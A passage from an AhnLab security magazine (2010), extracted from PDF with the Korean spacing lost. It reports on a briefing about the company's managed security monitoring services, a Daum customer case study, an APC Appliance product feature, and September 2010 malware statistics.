를제공한다는안철수연구소보안관제서비스의핵심이다. 두시간여에걸쳐전반적인 IT 및보안이슈에관해살펴본 1부를 25

마치고잠시쉬어가는시간이마련됐다. 대부분의참관객들은행 사장외부에마련된제품시연테이블앞에모여들어다양한제 품의구동및기술구현의실제모습을꼼꼼하게살펴보거나곳 곳에서시연자들을에워싸고즉석에서문답시간을갖는등뜨거 운관심을보였다. 보안관리자의골칫거리해결, AhnLab Sefinity WebShell 탐지서비스 잠시후이어진설명회 2 부는사업기획팀이상구차장의 ' 웹쉘 (WebShell)' 로대표되는최근의웹위협에대한설명과대응책인 안철수연구소의 ' 사이트케어 (SiteCare)' 소개로시작됐다. 이상구 차장은우선다양한웹위협의심각성의예를설명하고 " 웹위협 은단순한비용의문제가아니라법적, 윤리적문제 " 라며 " 기업의 비즈니스는물론, 기업의생존과도연결된다 " 고말했다. 또한 " 기 존보안대책으로는반복적인문제가발생하는것을막을수없 다 " 며 " 기존의패킷위주의검사가아니라실제소스위주의검 사, 그리고행위기반의탐지가필요하다 " 고설명했다. 특히실제 보안관리자들의실제고민을예로들고, 보안관리자의측면에 서탐지및제어가어려운웹쉘에대해소개하자참관객들의집 중도가더욱높아졌다. 이상구차장은 " 올해초까지관제사고와 관련해거의 100% 가웹쉘에의한사고 " 라며 " 그러나웹쉘은기존 보안솔루션으로는탐지가불가능하고, 웹방화벽도웹쉘공격을 탐지하지못하며자동화탐지기능인일반백신으로도웹쉘의스 크립트는탐지할수없다 " 고설명했다. 또한 " 소스코드를직접검 사할필요가있어웹쉘은일반인 ( 비보안전문가 ) 들이정탐또는 오탐을판단하기가어렵기때문에보안전문가수준의지식이필 수 " 라며 " 특히원스톱으로통합관리되지않으면효과적으로웹쉘 을차단하기가어렵다 " 고말했다. 이러한웹쉘대응책으로 ' 사이트케어 (SiteCare)' 를소개한이상구 차장은 " 사이트케어는 URL 크롤링을통해웹사이트에악성코드 가있는지확인하여조치방안까지상세하게보고할뿐만아니라 콘텐츠에묻어있는스크립트를분석하고실제악성코드를시뮬레 이션해보기때문에오탐이없다 " 고설명했다. 또한 " 사이트케어 는포괄적이고전반적인콘텐츠에대한탐지로전반적인보안서 비스를제공하기때문에보안관제담당자들뿐만아니라웹서버 관리자나보안관리자들에게도반응이좋다 " 고말했다. 이상구차 장의설명에따르면사이트케어에는안철수연구소가세계최초로 개발한 Anti-MalSite Engine 이탑재되어있어난독화된악성요소 를분석할수있으며, 외부서버로링크되어있는스크립트까지 진단이가능하다. 또한날로복잡해져가고있는 HTML 구조에서도 어느위치에악성요소가존재하는지정확히분석한다. 따라서 보안관제요원뿐만아니라웹서버관리자나보안관리자들도쉽 게웹의악성요소를제거할수있다는것이다. 이상구차장은 " 안철수연구소는기본도잘하고변화하는위협에 대응하여신규서비스발굴을위한노력도게을리하지않고있 다 " 며 " 관리자들의고민해결을위해노력하고있다 " 는말로발표 를마무리했다. AhnLab Sefinity SiteCare 서비스로보안관제의고도화 마지막발표로 CERT 팀곽희선차장의 ' 효과적인 Sefinity 활 용방안및사례 ' 가이어졌다. 곽희선차장은 "Sefinity 포털은 ESM(Enterprise Security Management) 과 RM(Risk Management) 의 요소들을관제에편리한방향으로모은것 " 이라고설명하고 " 다양 한방법으로분석할수있도록시스템이되어있다 " 고말했다. 또 한 "Sefinity 는관제를고도화하는작업을진행한다 " 며 " 위협을해 킹단계별로세분화하여정보수집의목적인지, 공격의목적인지, 혹은공격성공후의반응인지를분류한다 " 고설명했다. 이어관 리자가 Sefinity 의보고서를받아보고무엇을어떻게해야하는가 에관해 " 안랩기준의자체분석에따른위험도분석하는데 low 의 경우에는참고만하시면되겠지만 high 의경우에는즉각적인대 응이필요하다 " 며 " 조치한내용, 대응방안에대해고객들께서유 의해서보시고내부적으로취해야할행동을해야할경우도있 다 " 고말했다. 한편활용사례와관련해 " 관제요원에따라전달되 는정보가차이가난다는고객의견이있었다 " 며 " 점검, 이벤트로 그, 점검방법가이드등표준적으로대응할수있는상세한가이 드를마련했다 " 고밝혔다. 또한실제 IDS 이벤트를보고있는고 객사의경우탐지된이벤트대비티켓발생비율이나보고된건이 적다고말하는일부고객이있었다는점도언급한뒤, 그러나 " 절 대이벤트를놓치고있지않다 " 고강조했다. 곽희선차장은 " 실제 위험성이있는공격에대해서모니터링중이며, 해당공격이벤 트를놓치지않기위해서시나리오및다이내믹필터와같은장 치들을통해서모니터링을진행하고있다 " 고설명하고 " 무엇보다 앞서언급한것처럼보고서에기록된조치한내용, 대응방안에 대해서는꼭살펴보고필요한조치가취해질수있도록해주셨으 면좋겠다 " 는당부도있지않았다. 보안관제를통한입체적인보안 참관객들의높은관심속에서숨가쁘게진행된이날설명회는시 26

S u c c e s s S t o r y 고객사례 조양현다음커뮤니케이션기업정보보호팀과장 "AhnLab Sefinity SiteCare 로악성코드급감, 더이상의 삽질 은없다." 자릿수가달라졌을만큼악성코드급격히감소 악성코드가이렇게적은데계속사용할필요가있냐는웃지못할반응도있어 안철수연구소보안관제고객초청신규서비스설명회에서참관객의많은관심을끌었던발표중하나는다음커뮤니케이션기업정보보호팀조양현과장의 AhnLab Sefinity SiteCare 고객사례발표였다. 같은보안관리자로서, 또는같은사용자의입장에서실제경험담을들어보는것은흔치않은기회인데다보다실질적인정보와판단에도움을얻을수있기때문일것이다. 조양현과장은 " 사이트케어 (SiteCare) 도입전까지내부적으로우려와이슈가많았다 " 면서 " 이자리를빌어커스터마이징이잘되도록도와준안랩의관계자여러분께감사를표한다 " 는말로발표를시작했다. 조양현과장은다음커뮤니케이션이제공하는서비스내의악성게시물과관련해 " 갈수록동적콘텐츠나이모티콘삽입등이많아지면서아름다운 ( 화려한 ) 게시물의형태를하고있다 " 며게시물을통한지능적인악성코드유포가급증하고있다고밝혔다. 이어이러한게시물내의악성코드를차단하기위한노력과관련해 " 상상할수있는범위에서다적용해봤지만효과가없었다 " 고사이트케어서비스도입전의상황을설명했다. " 특히수동탐지, 파악으로엄청난업무소모량으로관리자의부담은커지고다른업무를수행할수도없을지경에이르렀다 " 며 " 농담삼아 ' 네버엔딩삽질 ' 이라고할정도였으며자동화할방법은요원하다는결론에도달했다 " 고말했다. 특히서비스특성상악성코드로판단하고게시물을삭제했는데게시자가악성코드가아니라고항의하거나적반하장으로악성코드인지는상관없이자신에게중요하기때문에보관하는것이라며항의하는경우가있어특별한삭제근거를마련할필요가있었다고설명했다. 또한 " 바로차단하지않으면히트 (hit) 수가많은사이트의경우악성코드전파가일파만파로커진다 " 며 " 반드시실시간성의보장이필요하다 " 고강조했다. 이어사이트케어를도입하게된과정을설명하며 " 처음에지인으로부터소개받았을때는기존의악성코드 DB와차이가없을것으로생각했다 " 며 " 타사와동일한수준의 DB라면데이터신뢰성이떨어진다고생각했다 " 고말했다. 또한사이트케어의도입을결정하는과정에서각각의서비스팀간의내부적인이슈와법적규제강화라는외부적인이슈등으로결정이쉽지않았으며, 특히악성게시물을리디렉트해보류하는정책을마련하는데만도꽤오랜시간이걸렸다고설명했다. 그러나천만명이상의사이트가드사용자들을통해형성된 DB라는말을듣고도입을결정했다는조양현과장은 " 도입후에는악성코드수의자릿수가달라졌을만큼급격한감소를보였다 " 고말했다. 또한 " 더불어고객보호의효과와법률에대한적극적인대응을할수있었을뿐만아니라수동탐지에따른소모적인리소스를보완하고많은부분을자동화한계기가됐다 " 고밝혔다. 실제로사이트케어를사용하고있다는 ' 인증샷 ' 캡처도제시하는센스 (?) 를보여준조양현과장은 " 악성코드수가급격히줄어들자임원진사이에서는악성코드가이렇게적은데서비스를계속이용할필요가있냐는웃지못할반응까지나타났다 " 고덧붙였다. 한편조양현과장은오해를피하기위해사이트케어의단점도언급해야겠다며 " 사이트케어가단순작업이나리소스를극적으로많이줄여주는것은맞지만자동화시스템에대한맹목적인신뢰는경계해야한다 " 고말했다. 또한 " 사이트케어로악성코드의위협에서완전히벗어나는것은아니다 " 며웹위협의근본적인특성을다시한번주지시키는한편관리자들의주의와노력을강조했다. 작과마찬가지로김홍선대표가마무리했다. 김홍선대표는이날행사에서발표된전반적인내용을정리하고 " 다양한기기들과애플리케이션등으로의접근성요구가높아지고사용성이증가하고있는것이전세계적인트렌드 " 라며 " 정보가소셜네트워크 (Social network) 로바로들어오는체제 " 라고말했다. 특히 " 지축이흔들리는변화 " 라는표현으로급변하는 IT 트렌드의변화, IT 활용성측면에서의변화를강조했다. 이와더불어악성코드의위협양상또한급변하고있다고설명하고, 특히 " 지능적인악성코드는지능적인범죄를가능하게하고투자대비효과가크다 " 며 " 이러한트렌드에맞춰입체적인보안이필요하다 " 고말했다. 또한 최근의위협은기존의솔루션으로는더이상막을수없다며이는 " 촌각을다투는이슈 " 라고강조했다. 이와관련해 " 안철수연구소는악성코드분석팀이바로옆에있다 " 며신속한대응을약속하는한편, " 여러분의서비스가안전하고편리하게운영될수있도록커스터마이징해드릴것 " 이라고덧붙였다. 끝으로김홍선대표는 " 여기계신보안담당자들과파트너로서서로의전문성을공유 (sharing) 하고싶다 " 고말하고 " 특히우리가보안관제분야에굉장히포커스 (focus) 를두고있다는것을알아주셨으면좋겠다 " 는말로이날보안관제고객초청설명회를마무리했다. 27

SOLUTION REVIEW AhnLab Sefinity 집중분석 2010.10/11 보안관제서비스의모든것! AhnLab Sefinity 꼼꼼하게뜯어보기 기업의웹사이트서비스를다운시키는 DDoS 공격을비롯해최근에는시설망자체를노리는스턱스넷까지나날이고도화되고심각해지는위협에기업비즈니스의어려움이가중되고있다. 이미상당수의기업들이보안위협에대응하기위해보안시스템을도입한상태지만관련지식이나기술부족, 또는인력부족등다양한이유로보안시스템을효율적으로운영하지못하는경우가허다하다. 이와관련해기업보안관리자의부담은물론. 임원진의고민을단번에해결해줄안철수연구소의보안관제서비스 AhnLab Sefinity 에관한모든것을꼼꼼히짚어보도록하자. AhnLab Sefinity 가뭔가요? AhnLab Sefinity 는안철수연구소보안관제서비스의 BI(Brand Identity) 입니다. 'Sefiity' 는 'Security beyond Infinity' 의합성어로, ' 보안, 그이상의보안 ' 이라는의미로풀이할수있습니다. 즉, IT보안그이상의서비스를제공하고자하는안철수연구소의의지가담겨있습니다. 보안시스템을도입하였으나운영이부담스러운기업날로복잡해지는침해에대응하기위해서보안시스템을도입했지만보안 / 해킹, 보안시스템운영에대한지식의부족, 또는기타의이유로보안시스템을효율적으로운영하고있지못하고있는기업이라면안철수연구소 Sefinity 보안관제서비스를통해기업의보안시스템을효율적으로운영할수있습니다. 그럼 ' 보안관제서비스 ' 란무엇인가요? 보안관제서비스, 또는 MSS(Managed Security Services) 란기업의일상적인 IT정보보안업무를효율적이고효과적으로수행하기위해일회성이아닌지속적으로보안전문가또는보안전문기업에게위탁하는 IT서비스입니다. 이러한측면에서보안관제서비스업체는고객사에위치한보안시스템을대상으로 24시간모니터링, 정책설정, 침입시도에대한탐지, 분석, 대응등기업에서지속적으로수행되어야하는일련의보안시스템운영업무를고객사로부터위탁받아서비스하는형태로제공합니다. 비용문제로보안시스템도입이꺼려지는기업보안시스템도입을고려중이지만예산및비용이부담스러운기업이라면이용한기간만큼서비스요금을지불하는방식의보안관제서비스를도입하여보안시스템도입및운영에소요되는비용절감의효과를가져올수있습니다. 자체적으로보안인력및보안조직을보유하기어려운기업상대적으로규모가작은기업의경우, 자체적으로보안인력또는보안조직을보유하기가쉽지않습니다. 보안관제서비스는고객사의보안시스템운영을대신맡아주기때문에기업의조직운영에부담이줄어듭니다. 어떨때보안관제서비스가필요할까요? 급변하는 IT 패러다임과더불어보안위협또한나날이급증하고있을뿐만아니라고도화, 입체화, 조직적범죄화의양상을보이고있습니다. 이러한상황에서상당수의기업들은보안제품을도입하고도이러한위협에대응하는데어려움을느끼는경우가많습니다. 때문에보안관제서비스는특히다음과같은기업에필요합니다. 잦은침해사고에대해상시대응이어려운기업침해사고는시간을가리지않고발생합니다. 언제발생할지모르는침해사고에대응하기위해상시대응인력보유가필수적입니다. 보안관제서비스는 24시간, 365 일고객의보안시스템을모니터링하며침해사고발생시에언제라도즉각대응할수있도록상시대응조직을운영하고있어침해사고로인한피해를최소화할수있습니다. 28

Managed Security Services Managed Security Services Professional Services Misc. Service Managed Firewall Service Managed IDS/IPS Service Managed UTM Service Managed WEB App. Firewall Service DDoS Protection Service WebShell Detection Service SiteCare Service Vulnerability Assessment Service Incident Response Service Penetration Test Service Anti-Spam Service Mail Security Service AhnLab CERT & ASEC <AhnLab Sefinity 보안관제서비스구성도 > 기업이자체적으로보안시스템을도입하는경우보안시스템운 영, 환경설정, 보안정책설정, 침입대응등보안시스템운영과관 련된일련의활동을모두고객이직접수행하여야합니다. 반면 보안관제서비스는보안시스템도입부터운영에관한일련의활 동을전문업체의노하우와책임하에운영할수있기때문에보다 전문적인보안환경구축이가능하며리소스낭비를막을수있습 니다. 보안시스템을도입하는것과보안관제서비스를이용하는것은어떤차이가있나요? 보안관제서비스를이용하면무엇이좋은가요? 보안관제서비스를이용하는기업은다음과같은혜택을누릴수 있습니다. 예산, 인력, 조직운영의유연성보안관제서비스는서비스를이용한기간만큼만서비스요금을지불하는방식으로, 보안관제서비스를이용하는기업고객은보안시스템도입및운영에소요되는비용절감의효과를얻을수있습니다. 또한고객사의보안시스템운영을대신맡아주기때문에막중한보안관리업무에소요되던인력자원을보다유용하게활용할수있어기업의조직운영에부담이줄어듭니다. 핵심사업에대한집중력및경쟁력강화 IT보안 20년노하우를지닌신뢰할수있는국내최고의안철수연구소보안관제서비스에기업의보안시스템운영업무를위탁함으로써고객은안심하고기업의핵심비즈니스에더욱집중할수있습니다. 또한세상에서가장안전한이름안철수연구소와더불어대고객이미지향상을통해경쟁력을강화할수있습니다. 향상된침해대응능력안철수연구소보안관제서비스는최신의보안기술을습득한보안전문가집단에의해서제공됩니다. 이들보안전문가에의한보안관제서비스는다양한침해시도에신속하고정확하게대응하여고객의침해대응능력을향상시키는효과를가져다줍니다. 24시간 x 365 일보안업무지원체계안철수연구소보안관제서비스는 24시간 365 일항시제공되는서비스입니다. 고객은보안시스템운영에있어서발생하는문제들에대해서언제든지안철수연구소보안관제센터의지원을받으실수있습니다. 저희회사는자체적으로보안부서를운영하고있는데요, 그래도보안관제서비스를이용할필요가있을까요? 기업에서자체적으로보안담당자또는보안관련부서를운영하 고있는경우, 보안관제서비스를이용하면보다효율적이고향 상된보안업무수행결과를얻을수있습니다. 보안관제서비스 제공업체의정보파악과분석을통해기업의보안관련부서는 자사의실질적인보안이슈에관한의사결정에보다집중할수 있으며, 이러한고객의의사결정에기반해보안관제서비스제공 업체가고객사최적의보안시스템운영및침해대응역할을수 행하기때문입니다. 29

AhnLab Sefinity 보안관제서비스만의특 / 장점은무엇인가요? 국내최초로정보보안서비스를선보인선두기업인안철수연구소 는국내에서유일하게 CERT( 컴퓨터침해사고대응센터 ) 와 ASEC( 시 큐리티대응센터, AhnLab Security Emergency response Center) 을 동시에보유하고있어침해사고에대해신속하고정확한대응이 가능합니다. 또한 AhnLab Sefinity 보안관제서비스는 3P 전략을 통해안철수연구소만의차별화된보안관제서비스를제공하고있 습니다. Preventive( 사전예방활동 ) 안철수연구소보안관제서비스는 24 시간, 365 일상시모니터링과 점검활동으로고객사의침해사고및장애발생을사전에인지하 고대응하는데역점을두고있습니다. Proactive( 능동적보안활동 ) 국내외다양한분야의 350 여고객사를보유한안철수연구소의보 안관제서비스노하우를토대로학습에기반한상황주도적인능 동적보안서비스를제공합니다. Personalized( 개별화된서비스 ) 안철수연구소보안관제서비스는 24 시간, 365 일상시모니터링과 점검활동으로고객사의침해사고및장애발생을사전에인지하 고대응하는데역점을두고있습니다. AhnLab Sefinity 가제공하는보안관제서비스에는어떤것이있는지궁금합니다. AhnLab Sefinity 는 Firewall 관제, IDS/IPS 관제, UTM 관제서비스, Web Application Firewall 관제, DDoS 방어서비스, 전문가서비스 에이어최근에는기업보안관리자들이수행하기에는부담스러 운수준까지의모니터링및탐지를수행해주는 SiteCare 서비스 와 WebShell 탐지서비스를제공하고있습니다. 이외에도쾌적 한기업업무환경의필수요소라할수있는 Anti-Spam 서비스, Mail Security 서비스도제공하고있습니다. 취약점점검서비스 기업의네트워크, 시스템에존재하는보안취약점을심도있게 점검하고발견된취약점에대한대응방안을제공하는서비스입 니다. 취약점점검서비스를통해기업의네트워크, 시스템자체 의보안성이향상되어내외부의위협으로부터보다안전한 IT 서 비스운영이가능합니다. 침해사고대응서비스 침해사고발생시침해원인및침입경로를분석하여유사한침 해사고가재발하지않도록재발방지가이드를제공합니다. 모의해킹서비스 고객사의요청과협의에따라안철수연구소의보안전문가가기 업내외부의가상해커역할을수행하여기업의네트워크및시 스템을공격하는것으로, 기업의실질적인 IT 보안수준을측정하 고발견된문제에대한대응방안을제시하는서비스입니다. AhnLab Sefinity Portal 이란것도있던데요? AhnLab Sefinity Portal 은보안관제서비스고객에게제공되는포 털사이트입니다. 보안관제서비스고객은서비스개시시점부터 AhnLab Sefinity Portal 의계정을발급받아접속할수있으며, 이후 제공되는침입대응현황조회, 보안이벤트모니터링, 보안정책 및기술지원요청, 서비스보고서조회, 보안권고문등의보안정 보수신등보안관제서비스에관한모든사항을 AhnLab Sefinity Portal 을통해손쉽게확인하실수있습니다. AhnLab Sefinity 에대해더자세히알아보고싶은데요, 어떻게해야할까요? 안철수연구소는홈페이지를통해보안관제서비스 AhnLab Sefinity 는물론모든제품에대한상세한정보를제공하고있습니 다. 안철수연구소홈페이지안랩닷컴 (www.ahnlab.com) 을방문하 시면 AhnLab Sefinity 에대한보다상세한정보를확인하실수있 습니다. 전문가서비스 (Professional Service) 라는것은무엇인가요? 안철수연구소의전문적이고숙련된보안전문가들이제공하는기업의네트워크, 시스템에대한취약점분석, 침해사고발생시의대응및모의해킹서비스등으로, 고객사에발생하거나발생할수있는침해시도에신속하고정확하게대응하여기업의보안환경향상에기여합니다. 30

NEW PRODUCT APC Appliance 2010.10/11 보안관리와 TCO 절감을위한선택, APC Appliance 공공기관보안관리자김과장의고민은? 한정된예산안에서통합보안관리체계를효과적으로구축하는방법이없을까 A 공공기관의보안관리자인김과장. 그는최근깊은고민에빠져있다. 그가속해있는 A기관에새롭게 PC 보안제품을설치하고이에대한통합관리체계를구축하는프로젝트를진행하게된것. 그의고민은본사뿐만아니라전국지사에있는보안제품을중앙에서어떻게효과적으로관리할수있는가하는문제이다. 특히, 넉넉하지못한예산이가장큰걸림돌이다. A기관은서울본사를비롯해경기도, 제주도에 2곳의지사를두고있다. 전체직원수는서울에 2천여명, 경기도에 2천여명, 제주도에 1천여명등총 5천여명이다. 이에대한통합보안관리체계를구축하기위해서는 PC 통합보안제품과중앙관리솔루션을제외하고도서버, DB, OS 등의기본인프라가구축되어야한다. 최소한지사별로서버 3대와중앙의통합관리서버 1대등총 4대의서버가있어야한다. 또한 OS 사용권 4카피 (copy), DB 라이선스 4 카피등이필요하다. 그런데현재사용중인서버와 DB 벤더사의라이선스계약사항을확인해보니볼륨라이선스계약이체결되어있지않다. 그런경우클라이언트액세스라이선스 (Client Access License), 접속권계약을체결해야하는데그비용이엄청나다. 그뿐만아니라 OS 와 DB 사용권도별도로구매해야만한다. PC 통합보안제품과중앙관리솔루션도입을목적으로진행하는프로젝트인데이를사용할수있는인프라를갖추는비용이훨씬더많이드는셈이다. 김과장은예산과라이선스문제, 배포와설치문제, 앞으로의관리문제로인한골칫거리때문에머리가지끈거린다. 그는 " 난단지백신을설치하고싶을뿐이다 " 라고외치고싶은심정이다. 김과장의고민을해결해줄수있는방법은없을까. 그의고민은의외로간단하다. 전국에분포해있는지사의 PC 보안제품까지중앙에서한번에효과적으로관리하고자하는것이다. 그리고접속권문제로인해불법소프트웨어사용자가되지않고저렴한비용으로이를해결하고자하는것이다. 김과장을위해안철수연구소가제안하는솔루션은바로 APC(AhnLab Policy Center) Appliance 이다. <APC Appliance> 과거에비해기업의정보자산보호를위한인식이발전하면서이제대다수의기업들이보안장비와솔루션을도입, 이용하고있다. 그러나급격히증가하는악성코드와더불어공격양상또한급변함에따라개별 PC의보안제품설치뿐만아니라조직내 PC 보안에대한중앙관리가더욱어려워지고있다. 또한최근지적재산권침해에관한공공기관감사결과발표와더불어기업및기관에대한불법소프트웨어복제및사용에대한단속이강화될것이라는보도가이어지고있어효과적인보안환경구축과더불어비용문제가이슈가되고있다. 이와관련해안철수연구소는최근불법소프트웨어사용이슈가없는어플라이언스형태의중앙관리솔루션 AhnLab Policy Center Appliance 를출시했다. 어플라이언스형태의중앙관리솔루션 AhnLab Policy Center Appliance 2000/5000 은 V3 Internet Security 제품군과 V3Net for Windows Server 제품군을관리할수있는어플라이언스형태의중앙관리솔루션이다. AhnLab Policy Center Appliance( 이하 APC Appliance) 는기업보안정책에따른보안제품관리는물론바이러스확산방지를위한사전방역기능및자산관리와원격지원등데스크톱매니지먼트 (Desktop Management) 기능을통해기업내전체 PC에대한제어및기업내발생가능한보안위협에효과적으로대처할수있다. 특히전원연결후간단한환경설정만으로바로서비스를이용할수있는어플라이언스형태이기때문에설치의번거로움이나기다리는시간이대폭줄어들었다. 또한어플라이언스기반의최적화된성능과안정성을지원해편의성과더불어향상된안정성을제공한다. APC 4.0 과동일 Admin 및 Agent 를지원하기때문에기존고객의별도학습은필요하지않다. 31

접속권비용절감 OS 및 DBMS 비용절감대용량처리지원으로추가라이선스구매비용절감 유연하게적용할수있다. 아울러기존 APC 4.0 과마찬가지로기업내전산관리자의환경과사용자분석을통해작성된 UX(User experience) 설계를적용한모니터센터를제공해보안관리자들이한눈에기업내보안환경을파악할수있다. 이외에도전원및패치관리, 원격제어, NAC 등새롭게추가되거나기존 APC 4.0 에서향상된기능들이제공된다. 접속권비용지불시 TCO 라이선스이슈해소, 대용량관리지원으로 TCO 절감 최근지적재산권침해에관한공공기관감사결과발표와더불어 기업및기관에대한불법소프트웨어복제및사용에대한단속 이강화될것이라는보도가이어지고있어기업의보안환경과관 련해관리의효율성못지않게비용문제가이슈가되고있다. 특 히서버소프트웨어와관련해서는 ' 사용권 ' 과 ' 접속권 ' 이존재하는 경우가있는데, 이에대한인식이부족해자신도모르는사이에 불법소프트웨어사용자로전락하기쉽다. 서버소프트웨어 ' 사용권 ' 이란각각의서버소프트웨어사용에대 해요구되는유료라이선스다. 이와별도로서버소프트웨어 ' 접 속권 ' 이존재하는데, 이는서버소프트웨어로의접속에대한각각 의클라이언트컴퓨터에요구되는라이선스로, 사용권과는별도 의비용이발생한다. 즉, 서버소프트웨어에접속하는클라이언트 수가많아질수록 ' 접속권 ' 의비용이증가하게되는것이다. 그러나 현재국내상당수기업들과일부공공기관에서는이 ' 서버소프트 웨어접속권 ' 에대한인식이부족하기때문에추후라이선스비용 과관련한이슈가발생할가능성이제기되고있다. 그러나 APC Appliance 는라이선스비용이거의발생하지않는 Linux OS 및데이터베이스를지원해라이선스비용이슈를극소 화한다. 또한볼륨라이선스계약고객뿐만아니라볼륨라이선 스계약이없는일반고객의경우도추가적인비용절감이가능 하다. 아울러 APC Appliance 는서버 1 대당 2,000, 또는 5,000 User 까지대용량처리가가능해하드웨어및추가라이선스구 매비용의부담을줄여줌으로써기업의총소유비용 (Total Cost of Ownership, TCO) 절감의효과를가져온다. 안정성강화, 편의성향상 볼륨라이선스계약시 TCO <APC Appliance 도입에따른 TCO 절감효과 > APC Appliance 2000/5000 이용시 TCO 전용플랫폼기반의 APC Appliance 는 Raid 옵션지원을통해데 이터안정성을강화하고, TCP 기반의통신구조로데이터신뢰성 을극대화했다. 특히 H/W, S/W, OS, DB 에대한원스탑관리로보 안관리자의편의성을향상시켰다. 서버와에이전트간실시간정 보교환이이루어져통합도메인콘솔구조로전체도메인에대 한제어및정보취합이가능하다. 또한최대 5 단계상 / 하위서버 간실시간명령 / 정책수행을지원하기때문에기업환경에따라 TrusGuard 연동통한 NAC 기능 1) 자사네트워크보안제품인 AhnLab TrusGuard 와의연동을통한 Network Access Control(NAC) 기능제공 2) 에이전트미설치시, 외부인터넷접근을차단하고설치유도페이지로리디렉션 (Redirection), 악성코드에감염된시스템을격리하거나감염된 PC의바이러스검사수행향상된패치관리및원격관리 1) 관리자의별도작업없이온라인패치설정을통해자동으로패치적용가능 2) 에이전트설치본만들기의원격제어옵션에서선택한권한통제에따라원격제어접속제한가능보안솔루션중앙관리 1) 안철수연구소의 Client/Server 보안제품인 V3 Internet Security 제품군과 V3Net for Windows Server 제품군의중앙관리 2) 에이전트자동설치를통해설치된보안제품의정책설정 / 관리모니터센터 1) 에이전트현황, 보안제품설치현황, 엔진업데이트현황, 바이러스 / 스파이웨어감염 Top 5 등의현황제공 2) 문제인식후해결을위한명령전달까지한번에가능바이러스확산방지를위한사전방역기능 1) 취약한패스워드를가진관리자계정과취약공유폴더를주기적으로검사하여시스템취약성제거 2) 네트워크차단을통해악성프로그램의확산속도저하자산관리 1) 에이전트컴퓨터의하드웨어정보와소프트웨어설치정보조회 ( 수집 ) 서버관리자가선택한그룹 / 에이전트의최신자산정보조회 APC Appliance 는 Cost-effective( 총소유비용절감 ), Convenient( 관리및설치편의성 ), Care-free( 안정성강화 ) 의 3C 전략으로, 기업의안전한보안환경을구축하여기업정보자산보호및비즈니스의연속성확보는물론비용절감을통한기업경쟁력강화에도기여한다. 32

STATISTICS 2010 년 9 월악성코드관련주요통계 2010.10/11 스크립트 / 웜 / 바이러스는증가트로잔 / 애드웨어 / 스파이웨어는감소 9월의악성코드유형별감염보고비율은스크립트, 웜, 바이러스는전월에비해증가세를보이고있는반면트로잔, 애드웨어, 드롭퍼, 다운로더, 스파이웨어는감소한것으로나타났다. 또한 9월에등장한신종악성코드를유형별로살펴보면트로잔이 74% 로 1 위를차지하였으며애드웨어가 15% 로 2위, 웜이 7% 로 3위를각각차지하였다. [ 그림 4] 악성코드유형별배포수 [ 그림 1] 악성코드유형별감염보고전월비교 Trojan 74% Adware 15% Worm 7% [ 그림 2] 신종악성코드유형별분포 [ 그림 3] 월별악성코드가발견된 URL 9월에화제가되었던악성코드로는해킹된트위터계정을통해전파되는가짜트윗덱업데이트악성코드, 악성 html 파일을첨부한스팸메일, 다시나타나 9월내내피해를주고있는 ARP Spoofing 악성코드, 아이폰탈옥툴을위장한악성코드등이있다. 특히 ASEC Report Vol. 9에서는침해사이트케이스스터디로 'ARP Spoofing 과결합한Onlinegamehack 에대한악성코드 ' 의유포방식을다루었으며악성코드감염을위해사용된취약점, 이를예방하기위한방법등을제시하였다. 또한 Asec Report Vol.9 에서는올 3 분기의보안동향과이슈가되었던악성코드를되돌아보았다. 2010 년 3분기악성코드감염보고는 TextImage/Autorun 이 1위를차지하였으며 JS/Iframe 과 JS/Exploit 가각각 2위와 3위를차지하였다. 또한 2010 년 3분기의악성코드월별감염보고건수는 37,022,157 건으로 2010 년 2분기의악성코드월별감염보고건수 34,205,361 건에비해 2,816,796 건이증가하였다. 이외에도이번호에서는중국, 일본, 그외해외지역의 3분기악성코드동향에대해서도살펴보았으며최근 ASEC 에높은비중으로접수되고있는악성코드로 90 퍼센트이상중국에서제작된 Win-Trojan/StartPage 에대해심도있게살펴본칼럼 ' 중국산시작페이지고정형악성코드의배포방법및예방법 ' 도다루었다. 안철수연구소홈페이지 (http://www.ahnlab.com/kr/site/ securitycenter/asec/asecreportview.do?groupcode=vni001) 를방문하면 ASEC Report 전문을볼수있다. [ 표 1] 악성코드유형별배포수 33